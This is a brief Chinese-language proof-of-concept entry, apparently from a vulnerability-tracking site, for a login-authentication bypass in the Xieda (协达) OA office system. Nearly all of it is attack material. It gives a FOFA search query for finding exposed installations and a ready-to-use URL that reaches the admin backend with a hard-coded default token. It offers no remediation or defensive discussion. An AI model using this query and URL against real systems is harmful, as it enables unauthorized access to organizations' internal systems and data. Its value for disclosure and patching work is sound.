协达OA系统绕过登录认证登陆后台

2024-07-26 协达OA系统 PoC Public

Description

协达OA系统是一款全面先进的OA系统协达 OA 存在登录认证绕过漏洞,攻击者利用默认的token登陆系统后台。

PoC

## 协达OA系统绕过登录认证登陆后台



## fofa

```

body="/interface/CheckLoginName.jsp"

```



## poc

```

http://ip/stylei/MainPage.jsp?token=YXR-YMD-SYQ-TOKEN

```

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.